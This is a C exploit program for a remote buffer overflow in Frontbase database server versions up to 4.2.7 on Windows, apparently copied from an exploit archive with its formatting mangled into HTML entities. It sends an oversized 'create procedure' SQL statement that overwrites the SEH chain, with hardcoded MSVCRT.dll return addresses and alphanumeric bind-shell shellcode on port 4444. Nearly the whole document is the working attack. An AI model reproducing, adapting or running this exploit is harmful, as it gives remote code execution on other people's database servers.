Frontbase <= 4.2.7 Remote Buffer Overflow Exploit (windows)

/*&nbsp;Dreatica-FXP&nbsp;crew *&nbsp; *&nbsp;---------------------------------------- *&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Frontbase&nbsp;<=&nbsp;4.2.7&nbsp;for&nbsp;Windows *&nbsp;Site&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.frontbase.com *&nbsp;Found&nbsp;by&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Netragard,&nbsp;L.L.C&nbsp;Advisory *&nbsp;---------------------------------------- *&nbsp;Exploit&nbsp;date&nbsp;&nbsp;&nbsp;:&nbsp;25.03.2007 *&nbsp;Exploit&nbsp;writer&nbsp;:&nbsp;Heretic2&nbsp;(heretic2x@gmail.com) *&nbsp;OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;(will&nbsp;add&nbsp;other&nbsp;later) *&nbsp;Crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Dreatica-FXP *&nbsp;---------------------------------------- *&nbsp;Info: *&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;last&nbsp;Windows&nbsp;version&nbsp;of&nbsp;Frontbase&nbsp;that&nbsp;you&nbsp;can&nbsp;found&nbsp;on&nbsp;official&nbsp;site&nbsp;www.frontbase.com *&nbsp;is&nbsp;the&nbsp;4.2.7d&nbsp;and&nbsp;this&nbsp;version&nbsp;is&nbsp;patched,&nbsp;so&nbsp;the&nbsp;exploit&nbsp;will&nbsp;not&nbsp;work&nbsp;here,&nbsp;i&nbsp;have&nbsp;tested&nbsp;that&nbsp; *&nbsp;exploit&nbsp;on&nbsp;the&nbsp;4.2.7&nbsp;version&nbsp;under&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;(not&nbsp;patched)&nbsp;and&nbsp;it&nbsp;is&nbsp;working&nbsp;good. *&nbsp; *&nbsp;The&nbsp;exploitation,&nbsp;as&nbsp;said&nbsp;in&nbsp;advisory,&nbsp;of&nbsp;this&nbsp;bug&nbsp;is&nbsp;easy:&nbsp;SEH&nbsp;and&nbsp;EIP&nbsp;overwrite&nbsp;methods. *&nbsp;but&nbsp;in&nbsp;\'real\'&nbsp;life&nbsp;the&nbsp;exploitation&nbsp;is&nbsp;more&nbsp;difficult,&nbsp;cause&nbsp;the&nbsp;server&nbsp;allows&nbsp;only&nbsp;alphanumeric *&nbsp;bytes,&nbsp;like:&nbsp;0x01&nbsp;0x02&nbsp;...&nbsp;0x7e&nbsp;0x7f&nbsp;. *&nbsp;other&nbsp;bytes:&nbsp;0x80&nbsp;...&nbsp;0xff&nbsp;come&nbsp;to&nbsp;server&nbsp;transformed: *&nbsp;&nbsp;0xEB&nbsp;will&nbsp;transform&nbsp;in&nbsp;two&nbsp;bytes&nbsp;0xC2&nbsp;0xAB *&nbsp;&nbsp;0xFF&nbsp;will&nbsp;transform&nbsp;in&nbsp;two&nbsp;bytes&nbsp;0xC3&nbsp;0xBF *&nbsp;and&nbsp;etc... *&nbsp; *&nbsp;so&nbsp;the&nbsp;exploitation&nbsp;become&nbsp;more&nbsp;difficult&nbsp;here,&nbsp;however&nbsp;in&nbsp;one&nbsp;place&nbsp;of&nbsp;buffer&nbsp;i&nbsp;send&nbsp;to&nbsp;the&nbsp;server&nbsp;byte&nbsp; *&nbsp;0xff,&nbsp;with&nbsp;assumptions&nbsp;that&nbsp;i&nbsp;will&nbsp;get&nbsp;the&nbsp;bytes&nbsp;0xC3&nbsp;0xBF&nbsp;and&nbsp;that&nbsp;the&nbsp;buffer&nbsp;will&nbsp;be&nbsp;one&nbsp;byte&nbsp;longer. *&nbsp; *&nbsp;for&nbsp;the&nbsp;correct&nbsp;exploitation&nbsp;i&nbsp;used&nbsp;some&nbsp;code&nbsp;from&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project&nbsp;and&nbsp;metasploit&nbsp;for&nbsp;the&nbsp;shellcodes. *&nbsp; *&nbsp;so&nbsp;the&nbsp;exploit&nbsp;is: *&nbsp;&nbsp;&nbsp;&nbsp;send&nbsp;3115&nbsp;bytes&nbsp;to&nbsp;server&nbsp;+&nbsp;address&nbsp;to&nbsp;overwrite&nbsp;SEH. *&nbsp;&nbsp;&nbsp;&nbsp;in&nbsp;my&nbsp;case&nbsp;i&nbsp;sent&nbsp;3114&nbsp;bytes,&nbsp;cause&nbsp;one&nbsp;0xff&nbsp;transformed&nbsp;in&nbsp;2&nbsp;symbols *&nbsp; *&nbsp;---------------------------------------- *&nbsp;Compiling: *&nbsp;&nbsp;To&nbsp;compile&nbsp;this&nbsp;exploit&nbsp;you&nbsp;need: *&nbsp;&nbsp;&nbsp;&nbsp;1.&nbsp;C:usrFrontBaseIncludeFBCAccess&nbsp;copy&nbsp;to&nbsp;exploit&nbsp;folder. *&nbsp;&nbsp;&nbsp;&nbsp;2.&nbsp;Copy&nbsp;from&nbsp;C:usrFrontBaselib&nbsp;file&nbsp;FBCAccess.lib&nbsp;to&nbsp;your&nbsp;exploit&nbsp;folder. *&nbsp;&nbsp;&nbsp;&nbsp;3.&nbsp;Select&nbsp;FBCAccess.lib&nbsp;in&nbsp;linker&nbsp;options *&nbsp;&nbsp;&nbsp;&nbsp;4.&nbsp;Compile. *&nbsp;---------------------------------------- *&nbsp;Thanks&nbsp;to: *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Netragard,&nbsp;L.L.C&nbsp;Advisory&nbsp;&nbsp;&nbsp;(&nbsp;http://www.netragard.com&nbsp;--&nbsp;\"We&nbsp;make&nbsp;I.T.&nbsp;Safe.\"&nbsp;) *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The&nbsp;Metasploit&nbsp;project&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;http://metasploit.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp; *&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dreatica-FXP&nbsp;crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) *&nbsp;---------------------------------------- * */ #include&nbsp;<stdio.h> #include&nbsp;<stdlib.h> #include&nbsp;<string.h> #include&nbsp;<winsock2.h> #pragma&nbsp;comment(lib,\"ws2_32\") #include&nbsp;\"FBCAccess/FBCAccess.h\" void&nbsp;usage(char&nbsp;*&nbsp;s); void&nbsp;logo(); void&nbsp;prepare_shellcode(unsigned&nbsp;char&nbsp;*&nbsp;fsh,&nbsp;int&nbsp;sh); void&nbsp;make_buffer(char&nbsp;*&nbsp;buf,&nbsp;int&nbsp;itarget,&nbsp;int&nbsp;sh); int&nbsp;&nbsp;validate_args(&nbsp;int&nbsp;port,&nbsp;int&nbsp;sh,&nbsp;int&nbsp;itarget); int&nbsp;&nbsp;send_buffer(char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;char&nbsp;*&nbsp;user,&nbsp;char&nbsp;*&nbsp;password,&nbsp;char&nbsp;*&nbsp;dbpassword,&nbsp;char&nbsp;*&nbsp;database,&nbsp;char&nbsp;*&nbsp;buf); //&nbsp;----------------------------------------------------------------- //&nbsp;XGetopt.cpp&nbsp;&nbsp;Version&nbsp;1.2 //&nbsp;----------------------------------------------------------------- int&nbsp;getopt(int&nbsp;argc,&nbsp;char&nbsp;*argv[],&nbsp;char&nbsp;*optstring); char *optarg; //&nbsp;global&nbsp;argument&nbsp;pointer int optind&nbsp;=&nbsp;0,&nbsp;opterr;&nbsp; //&nbsp;global&nbsp;argv&nbsp;index //&nbsp;----------------------------------------------------------------- //&nbsp;----------------------------------------------------------------- struct&nbsp;{ const&nbsp;char&nbsp;*t&nbsp;; unsigned&nbsp;long&nbsp;ret&nbsp;; }&nbsp;targets[]=&nbsp; { //&nbsp;we&nbsp;need&nbsp;alphanumeric&nbsp;addreses&nbsp;so&nbsp;this&nbsp;one&nbsp;found&nbsp;in&nbsp;MSVCRT.dll&nbsp;(there&nbsp;are&nbsp;a&nbsp;lot&nbsp;in&nbsp;it)&nbsp; {\"Windows&nbsp;2000&nbsp;SP4&nbsp;no&nbsp;patches,&nbsp;MSVCRT.dll\", 0x78014c40&nbsp;},//pop,&nbsp;pop,&nbsp;ret {\"Windows&nbsp;2000&nbsp;SP4&nbsp;no&nbsp;pathces,&nbsp;MSVCRT.dll\", 0x7803382b&nbsp;},//jmp&nbsp;ebx {NULL, 0x00000000&nbsp;} }; struct&nbsp;{ const&nbsp;char&nbsp;*&nbsp;name; char&nbsp;*&nbsp;shellcode; }shellcodes[]={&nbsp; &nbsp;{\"Spawn&nbsp;bindshell&nbsp;on&nbsp;port&nbsp;4444\",&nbsp; &nbsp;/*&nbsp;modified&nbsp;win32_bind&nbsp;-&nbsp;&nbsp;EXITFUNC=seh&nbsp;LPORT=4444&nbsp;Encoder=Alpha2&nbsp;http://metasploit.com&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;first&nbsp;jmp&nbsp;instructions&nbsp;replaced&nbsp;by&nbsp;alphanumeric&nbsp;code&nbsp;taken&nbsp;from&nbsp;the&nbsp;win32&nbsp;SEH&nbsp;GetPC&nbsp;project.&nbsp;*/ \"x56x54x58x36x33x30x56x58x48x34x39x48x48x48x50x68\" \"x59x41x41x51x68x5Ax59x59x59x59x41x41x51x51x44x44\" \"x44x64x33x36x46x46x46x46x54x58x56x6Ax30x50x50x54\" \"x55x50x50x61x33x30x31x30x38x39x49x49x49x49x49x49\" \"x49x49x49x49x49x37x49x49x49x49x49x49x51x5ax6ax66\" \"x58x30x42x31x50x41x42x6bx42x41x76x32x42x42x32x41\" \"x41x30x41x41x42x58x50x38x42x42x75x38x69x39x6cx52\" \"x4ax5ax4bx42x6dx68x68x48x79x4bx4fx6bx4fx4bx4fx65\" \"x30x6cx4bx30x6cx31x34x71x34x4ex6bx42x65x65x6cx6e\" \"x6bx53x4cx43x35x62x58x55x51x4ax4fx4ex6bx72x6fx54\" \"x58x6cx4bx51x4fx77x50x53x31x78x6bx43x79x4ex6bx54\" \"x74x6cx4bx35x51x6ax4ex64x71x6fx30x6ex79x6ex4cx6d\" \"x54x6fx30x64x34x55x57x4fx31x59x5ax36x6dx36x61x59\" \"x52x5ax4bx4cx34x37x4bx62x74x47x54x46x48x70x75x4d\" \"x35x6cx4bx73x6fx64x64x33x31x4ax4bx43x56x4cx4bx44\" \"x4cx62x6bx6ex6bx63x6fx57x6cx65x51x6ax4bx77x73x56\" \"x4cx6cx4bx6ex69x62x4cx44x64x45x4cx55x31x6fx33x44\" \"x71x6bx6bx51x74x4ex6bx53x73x30x30x4ex6bx57x30x34\" \"x4cx6cx4bx64x30x37x6cx4ex4dx6cx4bx53x70x73x38x73\" \"x6ex30x68x4cx4ex62x6ex74x4ex38x6cx30x50x79x6fx6a\" \"x76x51x76x30x53x42x46x72x48x35x63x45x62x33x58x64\" \"x37x64x33x74x72x43x6fx33x64x4bx4fx78x50x52x48x38\" \"x4bx7ax4dx4bx4cx57x4bx62x70x69x6fx6ex36x71x4fx6e\" \"x69x4bx55x33x56x6cx41x4ax4dx76x68x74x42x63x65x51\" \"x7ax77x72x4bx4fx4ax70x63x58x6ex39x35x59x6bx45x4e\" \"x4dx30x57x4bx4fx38x56x50x53x50x53x42x73x51x43x70\" \"x53x70x43x32x73x52x63x76x33x59x6fx6ex30x55x36x33\" \"x58x76x71x71x4cx63x56x56x33x6ex69x59x71x4ex75x55\" \"x38x4cx64x55x4ax72x50x6bx77x56x37x4bx4fx4ex36x53\" \"x5ax56x70x32x71x33x65x69x6fx4ex30x62x48x39x34x4c\" \"x6dx74x6ex4ax49x63x67x69x6fx79x46x43x63x36x35x6b\" \"x4fx68x50x35x38x5ax45x70x49x6dx56x70x49x41x47x6b\" \"x4fx68x56x56x30x41x44x33x64x71x45x69x6fx4ex30x4d\" \"x43x53x58x5ax47x70x79x6bx76x73x49x41x47x49x6fx4e\" \"x36x63x65x4bx4fx4ex30x53x56x50x6ax35x34x53x56x41\" \"x78x61x73x30x6dx4cx49x4bx55x72x4ax72x70x76x39x45\" \"x79x58x4cx6bx39x59x77x31x7ax67x34x4cx49x49x72x70\" \"x31x6fx30x6cx33x6fx5ax69x6ex72x62x36x4dx4bx4ex53\" \"x72x34x6cx6ax33x6ex6dx62x5ax36x58x6cx6bx4cx6bx4e\" \"x4bx61x78x30x72x6bx4ex6dx63x46x76x4bx4fx44x35x32\" \"x64x39x6fx38x56x51x4bx70x57x52x72x70x51x32x71x53\" \"x61x42x4ax43x31x56x31x46x31x70x55x43x61x79x6fx6a\" \"x70x62x48x6ex4dx59x49x67x75x7ax6ex33x63x39x6fx59\" \"x46x63x5ax59x6fx4bx4fx76x57x6bx4fx6ax70x4cx4bx61\" \"x47x59x6cx6bx33x38x44x43x54x49x6fx58x56x36x32x59\" \"x6fx4ex30x43x58x68x70x4fx7ax54x44x73x6fx71x43x4b\" \"x4fx4ex36x6bx4fx78x50x66\" &nbsp;}, &nbsp; {NULL&nbsp;,&nbsp;NULL&nbsp;} }; //&nbsp;alphanumeric&nbsp;long&nbsp;back&nbsp;jump,&nbsp;using&nbsp;SEH&nbsp;method! char&nbsp;jmptoshellcode[]= //&nbsp;at&nbsp;the&nbsp;time&nbsp;of&nbsp;jump&nbsp;we&nbsp;have&nbsp;in&nbsp;EBX&nbsp;the&nbsp;address&nbsp;where&nbsp;we&nbsp;jumped&nbsp;after&nbsp;SEH&nbsp;exploitation //&nbsp;so&nbsp;we&nbsp;can&nbsp;use&nbsp;it&nbsp;to&nbsp;jump&nbsp;[EBX-0C20] \"x56x54x58x36x33x30x56x58x50x50x5fx53x58x66x2dx20\"&nbsp; \"x0Cx50x59x58x64x33x3fx64x31x38x51x57x64x31x20x6c\"; int&nbsp;main(int&nbsp;argc,&nbsp;char&nbsp;**argv) { char&nbsp;temp1[100],&nbsp;temp2[100]; char&nbsp;*&nbsp;remotehost=NULL,&nbsp;*&nbsp;user=NULL,&nbsp;*&nbsp;password=NULL,&nbsp;*&nbsp;database=NULL,&nbsp;*&nbsp;dbpassword=NULL; char&nbsp;default_remotehost[]=\"127.0.0.1\"; char&nbsp;default_user[]=\"_SYSTEM\"; char&nbsp;default_password[]=\"\"; char&nbsp;default_database[]=\"\"; char&nbsp;default_dbpassword[]=\"\"; int&nbsp;port,&nbsp;itarget,&nbsp;sh; char&nbsp;c; logo(); if(argc<2) { usage(argv[0]); return&nbsp;-1; } //&nbsp;set&nbsp;defaults port=-1; itarget=0; sh=0; //&nbsp;------------ while((c&nbsp;=&nbsp;getopt(argc,&nbsp;argv,&nbsp;\"h:p:s:t:u:P:d:D:\"))!=&nbsp;EOF) { switch&nbsp;(c) { case&nbsp;\'h\': remotehost=optarg; break;&nbsp; case&nbsp;\'s\': sscanf(optarg,&nbsp;\"%d\",&nbsp;&sh); sh--; break; case&nbsp;\'t\': sscanf(optarg,&nbsp;\"%d\",&nbsp;&itarget); itarget--; break; case&nbsp;\'p\': sscanf(optarg,&nbsp;\"%d\",&nbsp;&port); break; case&nbsp;\'u\': user=optarg; break;&nbsp; case&nbsp;\'P\': password=optarg; break;&nbsp; case&nbsp;\'d\': database=optarg; break;&nbsp; default: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;usage(argv[0]); return&nbsp;-1; } } if(validate_args(&nbsp;port,&nbsp;sh,&nbsp;itarget)==-1)&nbsp;return&nbsp;-1; if(remotehost&nbsp;==&nbsp;NULL)&nbsp;remotehost=default_remotehost; if(user&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;user=default_user; if(password&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;password=default_password; if(dbpassword&nbsp;==&nbsp;NULL)&nbsp;dbpassword=default_dbpassword; if(database&nbsp;&nbsp;&nbsp;==&nbsp;NULL)&nbsp;database=default_database; memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(remotehost)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Host&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp; \",&nbsp;remotehost,&nbsp;temp1); if(port!=-1) { sprintf(temp2,&nbsp;\"%d\",&nbsp;port); memset(temp1,0,sizeof(temp1)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Port&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp; \",&nbsp;temp2,&nbsp;temp1); }else { sprintf(temp2,&nbsp;\"%s\",&nbsp;database); memset(temp1,0,sizeof(temp1)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Database:&nbsp;%s%s#&nbsp; \",&nbsp;temp2,&nbsp;temp1); } sprintf(temp2,&nbsp;\"%s\",&nbsp;user); memset(temp1,0,sizeof(temp1)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;%s%s#&nbsp; \",&nbsp;temp2,&nbsp;temp1); sprintf(temp2,&nbsp;\"%s\",&nbsp;database); memset(temp1,0,sizeof(temp1)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Database:&nbsp;%s%s#&nbsp; \",&nbsp;temp2,&nbsp;temp1); memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); sprintf(temp2,&nbsp;\"%s\",&nbsp;shellcodes[sh].name&nbsp;); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(temp2)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Shellcde:&nbsp;%s%s#&nbsp; \",&nbsp;temp2,&nbsp;temp1); memset(temp1,0,sizeof(temp1)); memset(temp1,&nbsp;\'x20\'&nbsp;,&nbsp;58&nbsp;-&nbsp;strlen(targets[itarget].t)&nbsp;-1); printf(\"&nbsp;#&nbsp;&nbsp;Target&nbsp;&nbsp;:&nbsp;%s%s#&nbsp; \",&nbsp;targets[itarget].t,&nbsp;temp1); printf(\"&nbsp;#&nbsp;-------------------------------------------------------------------&nbsp;#&nbsp; \"); fflush(stdout); char&nbsp;buf[20000]; memset(buf,0,sizeof(buf)); printf(\"[+]&nbsp;Constructing&nbsp;attacking&nbsp;buffer...&nbsp;\"); fflush(stdout); make_buffer((char&nbsp;*)buf,itarget,sh); printf(\"done \"); if(send_buffer(remotehost,port,&nbsp;user,&nbsp;password,&nbsp;dbpassword,&nbsp;database,&nbsp;buf)==-1) { fprintf(stdout,&nbsp;\"[-]&nbsp;Cannot&nbsp;exploit&nbsp;server&nbsp;%s \",&nbsp;remotehost); return&nbsp;-1; } return&nbsp;0; } int&nbsp;validate_args(int&nbsp;port,&nbsp;int&nbsp;sh,&nbsp;int&nbsp;itarget) { int&nbsp;i=0,x=0; for(i=0;shellcodes[i].name;i++)if(i==sh)x=1; &nbsp;&nbsp;&nbsp;&nbsp;if(x==0) { printf(\"[-]&nbsp;The&nbsp;shellcode&nbsp;number&nbsp;is&nbsp;invalid \"); return&nbsp;-1; } x=0; for(i=0;targets[i].t;i++)if(i==itarget)x=1; if(x==0) { printf(\"[-]&nbsp;The&nbsp;target&nbsp;is&nbsp;invalid \"); return&nbsp;-1; } return&nbsp;1; } void&nbsp;prepare_shellcode(&nbsp;char&nbsp;*&nbsp;fsh,&nbsp;int&nbsp;sh) { memcpy(fsh,&nbsp;shellcodes[sh].shellcode,&nbsp;strlen(shellcodes[sh].shellcode)); } void&nbsp;make_buffer(char&nbsp;*&nbsp;buf,&nbsp;int&nbsp;itarget,&nbsp;int&nbsp;sh) { //&nbsp;-=[&nbsp;prepare&nbsp;shellcode&nbsp;]=- char&nbsp;*&nbsp;fsh; fsh&nbsp;=&nbsp;(char&nbsp;*)&nbsp;malloc&nbsp;((strlen(shellcodes[sh].shellcode)+1)&nbsp;); memset(fsh,&nbsp;0,&nbsp;(strlen(shellcodes[sh].shellcode)+1)); prepare_shellcode(fsh,&nbsp;sh); //&nbsp;----------------- &nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;-=[&nbsp;fill&nbsp;buffer&nbsp;here&nbsp;&nbsp;]=- memset(buf,0,sizeof(buf)); char&nbsp;*&nbsp;cp&nbsp;=&nbsp;buf; //&nbsp;make&nbsp;vulnerable&nbsp;sql92&nbsp;command&nbsp;to&nbsp;get&nbsp;exploit strcat(buf,&nbsp;\"create&nbsp;procedure&nbsp;\"\"); cp=buf+strlen(buf); //&nbsp;some&nbsp;useless&nbsp;bytes memset(cp,&nbsp;\'A\',&nbsp;7);&nbsp;&nbsp; cp+=strlen((char&nbsp;*)cp); //&nbsp;shellcode memcpy(cp,&nbsp;fsh,&nbsp;strlen(fsh)); cp+=strlen((char&nbsp;*)cp); //&nbsp;fill&nbsp;after&nbsp;shellcode memset(cp,&nbsp;\'A\',&nbsp;3045-strlen(fsh));&nbsp;&nbsp; cp+=strlen((char&nbsp;*)cp); //&nbsp;alphanumeric&nbsp;long&nbsp;jump&nbsp;to&nbsp;our&nbsp;shellcode&nbsp;at&nbsp;the&nbsp;start&nbsp;of&nbsp;the&nbsp;buffer memcpy(cp,&nbsp;jmptoshellcode,&nbsp;strlen(jmptoshellcode)); cp+=strlen((char&nbsp;*)cp); memset(cp,&nbsp;\'A\',&nbsp;59-strlen(jmptoshellcode));&nbsp;&nbsp; cp+=strlen((char&nbsp;*)cp); //&nbsp;at&nbsp;this&nbsp;place&nbsp;in&nbsp;stack&nbsp;points&nbsp;EBX&nbsp;and&nbsp;RET&nbsp;will&nbsp;go&nbsp;here,&nbsp;so&nbsp;we&nbsp;need&nbsp;to&nbsp;jmp&nbsp;upper&nbsp; //&nbsp;to&nbsp;prepare&nbsp;alphanumeric&nbsp;long&nbsp;jump *cp++&nbsp;=&nbsp;\'x74\';&nbsp;//&nbsp;JNE&nbsp;...&nbsp;at&nbsp;this&nbsp;point&nbsp;JNE&nbsp;will&nbsp;jump&nbsp;cause&nbsp;the&nbsp;last&nbsp;CMP&nbsp;was&nbsp;\'not&nbsp;equal\' *cp++&nbsp;=&nbsp;\'xff\';&nbsp;//&nbsp;this&nbsp;is&nbsp;not&nbsp;alphanumeric&nbsp;,&nbsp;but&nbsp;the&nbsp;server&nbsp;will&nbsp;transform&nbsp;xff&nbsp;->&nbsp;xC3xBF //&nbsp;so&nbsp;this&nbsp;will&nbsp;give&nbsp;us&nbsp;the&nbsp;JNE&nbsp;C3&nbsp;and&nbsp;we&nbsp;will&nbsp;jump&nbsp;upper&nbsp;for&nbsp;59&nbsp;bytes //&nbsp;where&nbsp;we&nbsp;put&nbsp;a&nbsp;longer&nbsp;jump&nbsp;to&nbsp;our&nbsp;shellcode.&nbsp;This&nbsp;will&nbsp;add&nbsp;one&nbsp;byte&nbsp;more&nbsp; //&nbsp;so&nbsp;we&nbsp;will&nbsp;send&nbsp;not&nbsp;3115,&nbsp;but&nbsp;3114&nbsp;bytes&nbsp;to&nbsp;overwrite&nbsp;SEH. *cp++&nbsp;=&nbsp;\'x41\';&nbsp; //&nbsp;SEH&nbsp;chain&nbsp;overwrite *cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp;&&nbsp;0xff); *cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;&nbsp;8)&nbsp;&&nbsp;0xff); *cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;16)&nbsp;&&nbsp;0xff); *cp++&nbsp;=&nbsp;(char)((targets[itarget].ret&nbsp;>>&nbsp;24)&nbsp;&&nbsp;0xff); //&nbsp;end&nbsp;of&nbsp;the&nbsp;sql92&nbsp;command memcpy(cp,&nbsp;\"\"() &nbsp;begin &nbsp;end;\",&nbsp;strlen(\"\"() &nbsp;begin &nbsp;end;\")); //&nbsp;----------------- } int&nbsp;send_buffer(char&nbsp;*&nbsp;host,&nbsp;int&nbsp;port,&nbsp;char&nbsp;*&nbsp;user,&nbsp;char&nbsp;*&nbsp;password,&nbsp;char&nbsp;*&nbsp;dbpassword,&nbsp;char&nbsp;*&nbsp;database,&nbsp;char&nbsp;*&nbsp;buf) { FBCDatabaseConnection&nbsp;*&nbsp;fbdc; FBCMetaData&nbsp;*meta; char&nbsp;sesn[]=\"dreatica-fxp\";&nbsp;&nbsp;&nbsp; if(database!=NULL)&nbsp;port&nbsp;=&nbsp;-1; fbcInitialize(); &nbsp;&nbsp;&nbsp; if&nbsp;(port!=-1) { printf(\"[+]&nbsp;Connecting&nbsp;to&nbsp;%s:%d \",&nbsp;host,&nbsp;port); fbdc&nbsp;=&nbsp;fbcdcConnectToDatabaseUsingPort(host,&nbsp;port,&nbsp;dbpassword);&nbsp; }else { printf(\"[+]&nbsp;Connecting&nbsp;to&nbsp;%s&nbsp;to&nbsp;database&nbsp;%s \",&nbsp;host,&nbsp;database); fbdc&nbsp;=&nbsp;fbcdcConnectToDatabase(database,&nbsp;host,&nbsp;dbpassword); } if&nbsp;(fbdc&nbsp;==&nbsp;NULL) { printf(\"[-]&nbsp;Cannot&nbsp;connect&nbsp;to&nbsp;%s \",&nbsp;host); return&nbsp;-1; } char&nbsp;*&nbsp;session_name=sesn; meta&nbsp;=&nbsp;fbcdcCreateSession(fbdc,&nbsp;session_name,&nbsp;user,&nbsp;password,&nbsp;\"system_user\"); if&nbsp;(fbcmdErrorsFound(meta)&nbsp;!=&nbsp;0) { printf(\"[-]&nbsp;Failed&nbsp;to&nbsp;create&nbsp;session \"); FBCErrorMetaData*&nbsp;emd&nbsp;=&nbsp;fbcdcErrorMetaData(fbdc,&nbsp;meta); char*&nbsp;msgs&nbsp;=&nbsp;fbcemdAllErrorMessages(emd); fbcemdRelease(emd); free(msgs); fbcmdRelease(meta); fbcdcClose(fbdc); fbcdcRelease(fbdc); return&nbsp;-1; }&nbsp;&nbsp;&nbsp; fbcmdRelease(meta); printf(\"[+]&nbsp;Sending&nbsp;%d&nbsp;bytes&nbsp;of&nbsp;buffer&nbsp;to&nbsp;server,&nbsp;check&nbsp;the&nbsp;shell \",&nbsp;strlen(buf)); //&nbsp;if&nbsp;exploit&nbsp;success,&nbsp;the&nbsp;app&nbsp;will&nbsp;stop&nbsp;here. meta&nbsp;=&nbsp;fbcdcExecuteDirectSQL(fbdc,&nbsp;buf); if&nbsp;(fbcmdErrorsFound(meta)&nbsp;!=&nbsp;0) { printf(\"[-]&nbsp;Failed&nbsp;to&nbsp;send&nbsp;buffer \"); FBCErrorMetaData*&nbsp;emd&nbsp;=&nbsp;fbcdcErrorMetaData(fbdc,&nbsp;meta); char*&nbsp;msgs&nbsp;=&nbsp;fbcemdAllErrorMessages(emd); fbcemdRelease(emd); free(msgs); fbcmdRelease(meta); fbcdcClose(fbdc); fbcdcRelease(fbdc); return&nbsp;-1; } fbcmdRelease(meta); return&nbsp;1; } //&nbsp;----------------------------------------------------------------- 